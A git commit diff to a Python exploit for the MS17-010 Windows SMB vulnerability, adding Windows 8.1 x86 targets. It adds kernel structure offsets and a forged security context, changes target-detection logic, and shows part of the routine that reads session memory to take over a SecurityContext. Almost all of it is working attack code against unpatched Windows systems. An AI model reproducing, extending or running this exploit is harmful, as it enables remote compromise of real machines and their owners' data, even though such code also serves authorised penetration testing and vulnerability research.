add support Win8 x86

This commit is contained in:
worawit
2017-07-11 15:48:06 +07:00
parent d787343067
commit af235b686e


@@ -7,11 +7,10 @@ import socket
import time import time
''' '''
MS17-010 exploit for Windows 7+ x64 by sleepya MS17-010 exploit for Windows 7+ by sleepya
Note: Note:
- The exploit should never crash a target (chance should be nearly 0%) - The exploit should never crash a target (chance should be nearly 0%)
- The exploit support only x64 target
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on: Tested on:
@@ -20,6 +19,7 @@ Tested on:
- Windows 8.1 x64 - Windows 8.1 x64
- Windows 2008 R2 SP1 x64 - Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64 - Windows 7 SP1 x64
- Windows 8.1 x86
- Windows 7 SP1 x86 - Windows 7 SP1 x86
''' '''
@@ -88,6 +88,13 @@ WIN8_INFO = {
'SECCTX_SIZE': 0x38, 'SECCTX_SIZE': 0x38,
} }
WIN8_32_INFO = {
'SESSION_SECCTX_OFFSET': 0x88,
'SESSION_ISNULL_OFFSET': 0x9e,
'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x24,
}
X86_INFO = { X86_INFO = {
'PTR_SIZE' : 4, 'PTR_SIZE' : 4,
'PTR_FMT' : 'I', 'PTR_FMT' : 'I',
@@ -161,10 +168,13 @@ def leak_frag_size(conn, tid, fid, info):
leakData = leakData[0x10d4:] # skip parameters and its own input leakData = leakData[0x10d4:] # skip parameters and its own input
if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag': if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 32 bit') print('Target is 32 bit')
if info['SESSION_SECCTX_OFFSET'] != WIN7_INFO['SESSION_SECCTX_OFFSET']: if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN7_32_INFO)
elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN8_32_INFO)
else:
print('The exploit does not support this 32 bit target') print('The exploit does not support this 32 bit target')
sys.exit() sys.exit()
info.update(WIN7_32_INFO)
info.update(X86_INFO) info.update(X86_INFO)
elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag': elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 64 bit') print('Target is 64 bit')
@@ -423,7 +433,7 @@ def exploit(target, pipe_name):
# read session struct to get SecurityContext address # read session struct to get SecurityContext address
sessionData = read_data(conn, info, info['session'], 0x100) sessionData = read_data(conn, info, info['session'], 0x100)
secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0] secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
# copy SecurityContext for restoration # copy SecurityContext for restoration
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE']) secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])